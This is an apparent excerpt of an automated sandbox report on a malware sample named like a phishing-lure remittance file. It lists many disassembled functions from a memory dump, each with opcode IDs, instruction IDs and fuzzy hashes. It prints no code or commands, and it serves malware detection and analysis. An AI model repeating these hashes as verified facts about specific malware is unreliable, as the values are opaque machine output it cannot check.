                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7076c85c80200066b4a77c0c9ee339ad77cd28c981ed86ee25f7967b2829f081
                                            • Instruction ID: 8bfedcc47b53334768f71dc30d652a40506982996fc80955c3e70acad37f4d30
                                            • Opcode Fuzzy Hash: 7076c85c80200066b4a77c0c9ee339ad77cd28c981ed86ee25f7967b2829f081
                                            • Instruction Fuzzy Hash: D5318CB26093018FE720CF19C840B2BFBE5FB98710F15496DEA849B391D770E948CB92
                                            Function 017CA6C7 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction ID: 948c05fea72c72a670fcbbfb29b1f937543076a94e77825257902afb959575ba
                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction Fuzzy Hash: FD3129B2B00B05AFD761CF69CE40B57BBF8BB08B50F14092DA59AC3651F630E900CB60
                                            Function 0183EBD0 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18dbfd9aded59dc15881e96eb03374942f3d3f2f21c99bdd3e2682941358dec4
                                            • Instruction ID: 0815723d51ecac296c8a06af2d999860dd84b87b985b7bcd194f8c3516bcd777
                                            • Opcode Fuzzy Hash: 18dbfd9aded59dc15881e96eb03374942f3d3f2f21c99bdd3e2682941358dec4
                                            • Instruction Fuzzy Hash: B73167715153018FC711EF19C58095ABBF1FBC9714F484AAEE488AB356E331DA46CB92
                                            Function 017B438F Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b3fbad5716a3c1381d5c7d2149c20913c363b94a3adb251843696bf7675d2ec
                                            • Instruction ID: 18b76868b4a79865be1d1ceb7f1e2d8985bfdd2805e025e99a1d930d9a69d670
                                            • Opcode Fuzzy Hash: 7b3fbad5716a3c1381d5c7d2149c20913c363b94a3adb251843696bf7675d2ec
                                            • Instruction Fuzzy Hash: 2E31AF71A002059FD720DFA8C9C4BAEFBFAAB84304F108529D647D765AE734E941CB90
                                            Function 0178CB7E Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                            • Instruction ID: ffe647a4f61f6b0f375482c5e9ecdc31f0a7365df8b299d2b0e543a2da0b0c96
                                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                            • Instruction Fuzzy Hash: 6C21E636E4065AAADB11ABB98845BEFFBF5AF54740F0580769E55E7340E270D90087A0
                                            Function 0178C156 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c7a3b887dfffc81a2d5188c8a1272a7227ddaeb66629b9c80fb41685c968b7d
                                            • Instruction ID: 4016c3e90295c48c57be0a55af770fd744b20d3ad4a2957a554be969e16235fe
                                            • Opcode Fuzzy Hash: 4c7a3b887dfffc81a2d5188c8a1272a7227ddaeb66629b9c80fb41685c968b7d
                                            • Instruction Fuzzy Hash: CE3149B15402518BDB31AF5CCC48BA9F7F4EF94304F9481A9D9859B386EA349985CF90
                                            Function 0184C3CD Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction ID: caa1c032fadd77f953081773082c4a57bd3829bf316733f01d59153f00cc02e0
                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction Fuzzy Hash: 55214D3660165A77CB15AB998D40ABAFFB8EF50710F40801EFB95CB591FB34DA40C361
                                            Function 0178E420 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b539ea26e4733acd94b0b8b1e805d79dd0fff8b6c69f2a2d3ae006581dd838ba
                                            • Instruction ID: ed0c0de49c9b9c9068acbc0748176a5be189a5907e12c4513dd1bf7bf8d6b95e
                                            • Opcode Fuzzy Hash: b539ea26e4733acd94b0b8b1e805d79dd0fff8b6c69f2a2d3ae006581dd838ba
                                            • Instruction Fuzzy Hash: 2831D431A8012CABDB31EF18CC45FEEF7B9AB15750F0101A1F649A7290DB749E808FA0
                                            Function 017C4588 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction ID: c1d176a6261471201958cd8e1c6be6c3eb3edb4d3d5e9b28ab0dfd41694437bf
                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction Fuzzy Hash: E2217431A00A09EBCB15CF58D594A8EFBB5FF48714F10806DEE16AF245D671DA058B50
                                            Function 017C44B0 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a92df4c5e800ebfca99c76110dcf82adcd1130a5b95f8d80015c28c74cefd57
                                            • Instruction ID: 4d6a8b6f2ebfcd54a2fe3a1487604c34fe05d507883da4bd7ad5f512b4c0f5b4
                                            • Opcode Fuzzy Hash: 8a92df4c5e800ebfca99c76110dcf82adcd1130a5b95f8d80015c28c74cefd57
                                            • Instruction Fuzzy Hash: 4121D1726047059FC722DF18D890B6BB7E4FB98B20F11452DFD559B644C730EA008BA2
                                            Function 0178E388 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction ID: 9866927d08a5a8650c5c861913f8317d609f44ef457f448eb845b81aca8af299
                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction Fuzzy Hash: F1318931600604EFD721DFA8C888F6AB7F9EF85354F1045A9E5568B680EB30EE02CB50
                                            Function 0180E609 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc81787aded704a5cbf4b0ee781d872490a97bc272473a836b2ae732adb2c487
                                            • Instruction ID: e9516b11e7052b8b95537997978286aa317ed6d9d55846389426ebf7c7d280f4
                                            • Opcode Fuzzy Hash: fc81787aded704a5cbf4b0ee781d872490a97bc272473a836b2ae732adb2c487
                                            • Instruction Fuzzy Hash: C4317A75A00209DFCB56CF18DC849AEB7B5EF84704B15485AF82ADB391EB31EA40CB90
                                            Function 018106F1 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18311a6a21f39b54fc60d8cdd89d3e49ebc12fe65388a8cab95b7f92d6916895
                                            • Instruction ID: 4a26fb16aaa3254af952589203f43218f06bf539dde8d6f4efc8c95bdfa7e82b
                                            • Opcode Fuzzy Hash: 18311a6a21f39b54fc60d8cdd89d3e49ebc12fe65388a8cab95b7f92d6916895
                                            • Instruction Fuzzy Hash: 9B217E72900129ABCF109F59C881ABEB7F8FF48740B554069F941EB254D739AE41CBA1
                                            Function 0181019F Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38ccaf5b8ab89512ef6b8594f9facbb44a38b71ec28b428e90684163a6923875
                                            • Instruction ID: becc4649c0b5f4b6cc8caa600c1a9d511dfd2740345a84d432de90a194b2041c
                                            • Opcode Fuzzy Hash: 38ccaf5b8ab89512ef6b8594f9facbb44a38b71ec28b428e90684163a6923875
                                            • Instruction Fuzzy Hash: 9621AB72600609AFD715DFACCD44E6AB7B8FF98740F140169F944DB691E638EE40CBA8
                                            Function 01810283 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86e3d44494f7bea94cedc40e986c31a3e83d8506c370ff3f708b1e7468855de4
                                            • Instruction ID: 5738cd2484d9f367cc4f83f2cb0f2d18a9874b8f2c022d6796b9b2b6b2ec7e32
                                            • Opcode Fuzzy Hash: 86e3d44494f7bea94cedc40e986c31a3e83d8506c370ff3f708b1e7468855de4
                                            • Instruction Fuzzy Hash: 4C21B07290434A9BD712EF99CC48F9BFBDCAF90344F084566BD81C7259D734DA84C6A2
                                            Function 017B2835 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2516f84952bac48f5a137f40be43c9c36f829bba11048b437cbb1360fd5cbc8a
                                            • Instruction ID: b4f39c2acbcf0df8148c1b0ffda1b4988bac45f529dee18697b234982e93aba1
                                            • Opcode Fuzzy Hash: 2516f84952bac48f5a137f40be43c9c36f829bba11048b437cbb1360fd5cbc8a
                                            • Instruction Fuzzy Hash: 3B210B31645681DBE322676CCC48F65FB94BF41774F1803A4FA249B7E7D768D8818251
                                            Function 017CA30B Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57a7a4ba6d93e267b0fa5b7361be384e6a6df8d999cc2508deccf2327a484f92
                                            • Instruction ID: f73a4d009c5f81f0635322a972f278bc30de17d1076b3d4378ee0d0378a81f95
                                            • Opcode Fuzzy Hash: 57a7a4ba6d93e267b0fa5b7361be384e6a6df8d999cc2508deccf2327a484f92
                                            • Instruction Fuzzy Hash: 25219835210A01AFC725DF29CC00B46B7E5AF48B04F24846CA509CBB62F231E942CB98
                                            Function 0184A49A Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47b5a0b609a253a4f2999aa4071f1416e3b7e5786a5e4411a351eb8164f5a339
                                            • Instruction ID: a8461e82f9231641ea0e3c12e8e351a333d00d129a51d9308b10983b2b9685eb
                                            • Opcode Fuzzy Hash: 47b5a0b609a253a4f2999aa4071f1416e3b7e5786a5e4411a351eb8164f5a339
                                            • Instruction Fuzzy Hash: 861127363C0B197BE7265598AC40F2BB699DBD4B60F120029B709CF291DF60DD0187D5
                                            Function 01810946 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4b4d05230057a5e9c83ae75e9d6b359801e051749227fae5dd1dcd3ff2fa942
                                            • Instruction ID: 4dad3652fa9e10fb3bebffbfdfc24e6613e617d6a61ff22f4c7f7e227f243f0a
                                            • Opcode Fuzzy Hash: b4b4d05230057a5e9c83ae75e9d6b359801e051749227fae5dd1dcd3ff2fa942
                                            • Instruction Fuzzy Hash: AD21E7B1E00209ABCB20DFAAD8949AEFBF9FF98710F10012EE505E7354D6749A45CF54
                                            Function 018280A8 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction ID: d90b903601342fa66ba5ad8550a80e01d985c005584fe3777aab9946ff2b7d08
                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction Fuzzy Hash: 78216F72900219EFDF129F58CC44B9EBBF9EF99310F204415F910A7291D734DA909B50
                                            Function 017C0124 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction ID: 07bddb907dc838b09c61f6a294249956ca5cdb1d365572f54ea90d595a580ff1
                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction Fuzzy Hash: 9F11EF76600605EFE7229B89DC45FAEFBB8EB80B54F10402DF7048B180E671ED44CBA0
                                            Function 01798770 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f073438bfca15baf32e606472bfca93151546a654d83953f8bbf6a7c8de49c14
                                            • Instruction ID: a6a718872255ba41fc8f070f1a8a2ff1f0946c273ddba5e0cd6b736a25487939
                                            • Opcode Fuzzy Hash: f073438bfca15baf32e606472bfca93151546a654d83953f8bbf6a7c8de49c14
                                            • Instruction Fuzzy Hash: 1311BF717006199BDF11CF8DE5C0A6AFBE9AF4B710B1880AEEE08DF215D6B2D905C791
                                            Function 017CAAEE Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                            • Instruction ID: 5e676ed9251ed6fb3b8524e936cd11df552233875f534200ff3433719f077705
                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                            • Instruction Fuzzy Hash: E7217772600A49DFDB268F49C544A66FBE6FB94F11F14897DE94A8BA10E730ED01CB90
                                            Function 017980E9 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09693774385399b8ba0d3f57384ebf56701530fd469bd8a28063b8ea289e0f02
                                            • Instruction ID: 41a08bdc377535c873252101ea04a6d37a2324482e69e46e074bdfd0ff1fdcea
                                            • Opcode Fuzzy Hash: 09693774385399b8ba0d3f57384ebf56701530fd469bd8a28063b8ea289e0f02
                                            • Instruction Fuzzy Hash: 63216F75A40209DFCB14CF58D581A6EFBB6FB89318F24416DD105AB311D771AD0ACBD1
                                            Function 017C674D Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03c4a3a7a19249edfaa7b662a38f0a654dcfe3fa22e3677914252578abb891fe
                                            • Instruction ID: 9283f73c28eb217a27a1581a9e65f94b67a4018d92d9f85570aa233fb16995ed
                                            • Opcode Fuzzy Hash: 03c4a3a7a19249edfaa7b662a38f0a654dcfe3fa22e3677914252578abb891fe
                                            • Instruction Fuzzy Hash: 7C216A71600A01EFD7209F68C880B66F7E8FF84B50F40882DE6AAC7751EA30E940CB60
                                            Function 017BE8C0 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8487ae7f467a53ca9cc5d09d024f1a702bcd2c124bfdc069702b19ce1c0a593d
                                            • Instruction ID: e531a99c2a998dcf8b00b7d6967d17e968904b8a54b4e08beec2e8f274fe382d
                                            • Opcode Fuzzy Hash: 8487ae7f467a53ca9cc5d09d024f1a702bcd2c124bfdc069702b19ce1c0a593d
                                            • Instruction Fuzzy Hash: 7A11E5333001149BCB19EA29CC95BABF256EBD5370B35462DDA22CB396EE309806C291
                                            Function 01826870 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e034aa30dcfc60b71a9e96c42945b10dc0b3eb1235084167f30c5d7ebb3c6f70
                                            • Instruction ID: ace37b579c0827ff80488b2762db46fa407cb23a47c9e72ee9c517cbf753c257
                                            • Opcode Fuzzy Hash: e034aa30dcfc60b71a9e96c42945b10dc0b3eb1235084167f30c5d7ebb3c6f70
                                            • Instruction Fuzzy Hash: 76119172340528EFC723DB5DCD40F9AB7E8EB99B54F214025FA05DB251EA70EA41CB90
                                            Function 017C66B0 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe7aeff792d98936568da84f8aeabc0ee577e1513506f89bf9dfc2bf15d2e944
                                            • Instruction ID: 7bcbee19132757c6fddb3db37a49ce93acec0308fa624f86b7ae5f8c8a808dd0
                                            • Opcode Fuzzy Hash: fe7aeff792d98936568da84f8aeabc0ee577e1513506f89bf9dfc2bf15d2e944
                                            • Instruction Fuzzy Hash: 2E11BF76A01206DFCB25EF99C9C0A5AFBE5EF84B10B11857DE9059B315F630DD00CB90
                                            Function 0185A8E4 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction ID: dc282e27ddb76ccc26043572d44472e9a678150c03310255c9c81a52ff8e4fe3
                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction Fuzzy Hash: 36110136A00919EFDB19CB58C845B9EFBB5EF84310F058269EC56E7340EA31AE41CBC0
                                            Function 01790AD0 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                            • Instruction ID: e59a4d6d001c0b8f563502a73388ffa686b76ced1320bc171d12ecbe40a45a36
                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                            • Instruction Fuzzy Hash: 8521F4B5A00B059FD3A0CF29D440B52BBF4FB48B20F10892AE98AC7B40E371E814CB90
                                            Function 0181E7E1 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                            • Instruction ID: 25b21c8aef0a8e794b674e1035b8e4b31d7f41f9f5124f58e1f97ff7b45f553b
                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                            • Instruction Fuzzy Hash: 0E11A333600605EFEB329F48D844B5ABBA9EF45754F05842CEE0ADB158DB31DE41DB90
                                            Function 017B27ED Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94192a1b252a220573bea03ef06125fea39ef42e07df757797d6dab715aebe37
                                            • Instruction ID: f2e57d74926c62ef64cbe59dc373183d44ad9684e82b8344b7754bec0e901e88
                                            • Opcode Fuzzy Hash: 94192a1b252a220573bea03ef06125fea39ef42e07df757797d6dab715aebe37
                                            • Instruction Fuzzy Hash: 6001D631746645ABE316A66DDC88F67FB9CEF80794F0500B9FA058B395DA14EC40C2A1
                                            Function 01794690 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
